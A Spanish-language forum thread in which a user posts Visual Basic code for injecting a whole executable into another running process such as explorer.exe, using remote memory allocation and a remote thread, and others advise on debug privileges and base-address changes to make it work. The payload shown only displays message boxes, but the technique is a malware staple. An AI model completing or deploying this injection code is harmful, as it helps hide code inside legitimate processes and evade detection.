EXE Injection

[XcryptOR]

tengo una duda, la inyección de code solo se puede hacer a otro ejecutable en VB, oh podria inyectar mi code a explorer.exe?

podria alguien postear algun code que sirva.

Código (vb) [Seleccionar] Expandir


Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal ProcessHandle As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Public Declare Function VirtualFreeEx Lib "kernel32" (ByVal ProcessHandle As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal ProcessHandle As Long, lpThreadAttributes As Long, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Public Declare Function GetModuleHandleA Lib "kernel32" (ByVal ModName As String) As Long
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal ProcessHandle As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nsize As Long, lpNumberOfBytesWritten As Long) As Long
Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Public Declare Function MessageBox Lib "user32" Alias "MessageBoxA" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
Public Declare Function CreateEvent Lib "kernel32" Alias "CreateEventA" (ByVal lpEventAttributes As Long, ByVal bManualReset As Long, ByVal bInitialState As Long, ByVal lpname As String) As Long
Public Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hmodule As Integer, ByVal lpFileName As String, ByVal nsize As Integer) As Integer
Public Declare Sub ExitThread Lib "kernel32" (ByVal dwExitCode As Long)
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

Const MEM_COMMIT = &H1000
Const MEM_RESERVE = &H2000
Const MEM_RELEASE = &H8000
Const PAGE_EXECUTE_READWRITE = &H40&
Const IMAGE_NUMBEROF_DIRECTIRY_ENRIES = 16
Const STANDARD_RIGHTS_REQUIRED = &HF0000
Const SYNCHRONIZE = &H100000
Const PROCESS_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)

Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type

Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDataStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
End Type

Type IMAGE_OPTIONAL_HEADER32
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitalizedData As Long
    SizeOfUninitalizedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    Reserved1 As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    Subsystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaerFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES - 1) As IMAGE_DATA_DIRECTORY
End Type

Type test
    t1 As Long
End Type

Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_onvo As Integer
    e_res(3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(9) As Integer
    e_lfanew As Long
End Type
Const szTarget As String = "project1"
Dim szSharedData As String * 261
Public Sub Main()
' Sub that will start when the program is run
Dim PID As Long, ProcessHandle As Long
Dim Size As Long, BytesWritten As Long, TID As Long, Module As Long, NewModule As Long
Dim PImageOptionalHeader As IMAGE_OPTIONAL_HEADER32, PImageDosHeader As IMAGE_DOS_HEADER, TImageFileHeader As IMAGE_FILE_HEADER, TestType As test

GetModuleFileName 0, szSharedData, 261

GetWindowThreadProcessId FindWindow(vbNullString, szTarget), PID

ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, PID)

Module = GetModuleHandleA(vbNullString)

CopyMemory PImageDosHeader, ByVal Module, Len(PImageDosHeader)

CopyMemory PImageOptionalHeader, ByVal (Module + PImageDosHeader.e_lfanew + 4 + Len(TImageFileHeader)), Len(PImageOptionalHeader)

Size = PImageOptionalHeader.SizeOfImage


VirtualFreeEx ProcessHandle, Module, 0, MEM_RELEASE

NewModule = VirtualAllocEx(ProcessHandle, Module, Size, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)

WriteProcessMemory ProcessHandle, ByVal NewModule, ByVal Module, Size, BytesWritten

CreateRemoteThread ProcessHandle, ByVal 0, 0, ByVal GetAdd(AddressOf HijackModule), ByVal Module, 0, TID

MsgBox "Handle of the process is: " & ProcessHandle & vbCrLf & "Callback of HijackModule is: " & GetAdd(AddressOf HijackModule) & vbCrLf & "Handle of module is: " & Module & vbCrLf & "Size of module is: " & Size & vbCrLf & "Memory was allocated at: " & NewModule & vbCrLf & "Thread created with handle: " & TID
End Sub

Private Function GetAdd(Entrypoint As Long) As Long
GetAdd = Entrypoint
End Function

Public Function HijackModule(Stuff As Long) As Long
MessageBox 0, "I am inside a hijacked application", "Hello!", 0
MessageBox 0, "Close the ""Inject"" message box and then delete me", "Hello!", 0
MessageBox 0, "You see? I am still running even if you deleted me.", "Hello!", 0
End Function



he estado intentando pero sin exito, agradeceria cualquier aporte que me puedan brindar,

Gracias.

[Fr4NN^]

La injeccion de code o de una dll x ejemplo se hace sobre un proceso q este corriendo.. injecta el code en la memoria..

aver si alguno tiene un buen code en vb y explica un pokito si tiene tiempo 

saludos

[aaronduran2]

Hay varios ejemplos de cobein en el foro, que mostraban como hacer inyección de DLL fácilmente.

Saludos.

[XcryptOR]

El tema es inyeccion de EXE.la inyeccion Dll no me da problemas, necesito es inyectar mi EXE dentro de otro por ejemplo explorer, entiendo que se inyecta la direccion a una funcion de mi EXE. el problema es que cuando lo ejecuto me dice que la memoria no se puede escribir.

[cobein]

Vas a necesitar ajustar los privilegios a SeDebugPrivilege.

[XcryptOR]

Si estoy dandole permisos, la verdad me parece mas que es un error en la llama da a la funcion VirtualAllocEx, que si no estoy mal ubica un espacio en memoria, he escuchado algo sobre la addresbase del exe, no se si estoy en lo correcto, quiero saber si alguien ha inyectado code en otro proceso, y si hay errores en mi code saberlo o como hacerlo funcionar. Bueno NO se trata de inyeccion DLL, sino inyección De un EXE en otro EXE.

gracias

[cobein]

Si, necesitas un control de compilador para modificar el base address cuando compilas sino no va a funcionar.

Edit: contesto tu otra pregunta, podrias inyectarlo en cualquier exe... pero eso va a depender de como lo programes.